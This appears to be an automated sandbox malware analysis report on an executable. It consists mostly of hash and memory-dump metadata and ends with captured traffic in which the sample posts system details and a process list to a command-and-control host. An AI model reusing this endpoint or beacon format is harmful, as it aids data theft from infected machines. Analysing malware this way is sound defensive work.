Instruction Fuzzy Hash: 7E81E461D0D78557E6219B35DA417EBB3E4AFE9308F099B28BD8C61013FB30BAD49352

Function 00E4D430 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf5e8c15fb917d84e8dbeb9f8b0eae9f5c7f70f4782451bd6cefc9b0e8aef92a
Instruction ID: 75d26573a006734fc9cbacd0a2935e9a92abfcac3e77e89ca4fc778c0b077105
Opcode Fuzzy Hash: cf5e8c15fb917d84e8dbeb9f8b0eae9f5c7f70f4782451bd6cefc9b0e8aef92a
Instruction Fuzzy Hash: 32813A72D18B828BD3158F28DC906B6B7A0FFDA304F14575EE8E617782E7749580C741

Function 00E46730 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 794aa7c8d055ad2a7f7c5d1f47d4d93c83fbca59360e5190f79d37a6f26244cc
Instruction ID: 5b9b07af7224c9a84c5a2b712b87cbfdafcddcc50668ef0ee74bc6eeb3d4c078
Opcode Fuzzy Hash: 794aa7c8d055ad2a7f7c5d1f47d4d93c83fbca59360e5190f79d37a6f26244cc
Instruction Fuzzy Hash: CA812A72D14B828BD7148F24D8806B6B7A0FFDB314F24AB1EE9E617782E7749580C781

Function 00E535B0 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bef105a08c025755530f3d4a2ebff885980b43f7044adeef54ad59999839378
Instruction ID: 01583753f97349d0563b51200dd3fc7769614e679e1307eece626f298033db38
Opcode Fuzzy Hash: 7bef105a08c025755530f3d4a2ebff885980b43f7044adeef54ad59999839378
Instruction Fuzzy Hash: 50617D72D087808BD3198F348880269BBA2EFC6355F258B6EFCD56B393D7749A49C740

Function 00C74B60 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19039c0b2b2611e093b453fd2d8bd6a8492cc8402b91856df5b13cc484ef1aa5
Instruction ID: 4f5da5937a7e77b8da9938d85745f44be9e3e1b84fd470273f673ae286287228
Opcode Fuzzy Hash: 19039c0b2b2611e093b453fd2d8bd6a8492cc8402b91856df5b13cc484ef1aa5
Instruction Fuzzy Hash: 5541F377F256280BE39C98699C5526A73C397C4310B8A463DDA96C73C5EC74DD16A3C0

Function 00E6A000 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction ID: feb5e8e0990837b33d0ce87783e83fb1b7a9ef193ab9731d55923e9606ce532c
Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction Fuzzy Hash: 4031D631B483194BC754AD6DE4C022AF6D39BD83A0F59D63CE589E3380E9718C488B82

Function 00D9AB2C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
Instruction ID: 4190aad474779dbc2b0907a278778bec926fd90bbbccb30242bb20fb4ef44ec9
Opcode Fuzzy Hash: 194b1e9f7992c7b919597fa56089a32913e4a1d6ceb8f728d31f22bf67bf3837
Instruction Fuzzy Hash: BDF0C233B612390B9360CDBA6C001D7A2C3A3C0370F1F8565EC84D7502E934CC4686D6

Function 00D9AAC0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
Instruction ID: 769484cfdf8c31494f137027c5ae90286714b6c46e94e8fe7173f367561f449d
Opcode Fuzzy Hash: fe21089785e6a1748e56388996be618063e6c4318fc8050aa5774256bf8bb64f
Instruction Fuzzy Hash: 1FF08C33A20A340B6360CC7A8D05097A2C797C86B0B0FC969ECA0E7206E930EC0656E1

Function 00CC9980 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e7b97b4133c09a8f8f1a7baa84deddf9e37356a2bc783342369b00963e3fb24
Instruction ID: b7676af22a00ae12169ada3229ccd61f6c825725ad654ba569b748fb8046520a
Opcode Fuzzy Hash: 0e7b97b4133c09a8f8f1a7baa84deddf9e37356a2bc783342369b00963e3fb24
Instruction Fuzzy Hash: 2EB012319002004B5726CD38E8755E532B2B3913103A6D4ECD00745004D735D0038B01

Function 00B46810 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 344COMMON

Download Yara Rule

Strings

[, xrefs: 00B469E1

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID:
String ID: [
API String ID: 0-784033777
Opcode ID: 4cf0425936876905c322401783123af14a5c396e741b8f052e1dee4d72e6a3d2
Instruction ID: 3cbd164ae5a3c03f05a025cbb567df6a1e819f50afbf2df36ad5135c9468ab65
Opcode Fuzzy Hash: 4cf0425936876905c322401783123af14a5c396e741b8f052e1dee4d72e6a3d2
Instruction Fuzzy Hash: B9B178719083916BDB398A20C8D277BBBD8EB57344F1809ADE8C5C6182EB65CF44B353

Function 00E6B1A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

islower.MSVCRT ref: 00E6B23A

Strings

$, xrefs: 00E6B1C4

Memory Dump Source

Source File: 00000000.00000002.1548532097.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1548499174.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.00000000010C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001226000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1548532097.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549251758.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.000000000122D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000013C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000014DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015C1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549272640.00000000015D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549602567.00000000015D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549725231.0000000001790000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1549743227.0000000001792000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Hqle5OSmLQ.jbxd

Similarity

API ID: islower
String ID: $
API String ID: 3326879001-3993045852
Opcode ID: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
Instruction ID: cb96e08c0eb8cac9ffb1c55f657890ed4e583478dbaf6e5d8acd9324d7c561f0
Opcode Fuzzy Hash: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
Instruction Fuzzy Hash: 5261F5307883458BC7149F69D88026FFBE6AFC5394F149A2DE4D5EB391E7B0D8858B42

Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: mov dword ptr [ebp+04h], 424D53FFh	0_2_00B4A5B0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_00B4A7F0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: mov dword ptr [edi+04h], 424D53FFh	0_2_00B4A7F0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: mov dword ptr [esi+04h], 424D53FFh	0_2_00B4A7F0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: mov dword ptr [edi+04h], 424D53FFh	0_2_00B4A7F0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: mov dword ptr [esi+04h], 424D53FFh	0_2_00B4A7F0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_00B4A7F0
Source: C:\Users\user\Desktop\Hqle5OSmLQ.exe	Code function: mov dword ptr [ebx+04h], 424D53FFh	0_2_00B4B560

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: /Content-Type: application/jsonContent-Length: 442494Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 36 38 37 33 39 31 36 33 36 32 37 34 33 33 37 36 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c
Source: global traffic	HTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: /
Source: global traffic	HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: /Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }

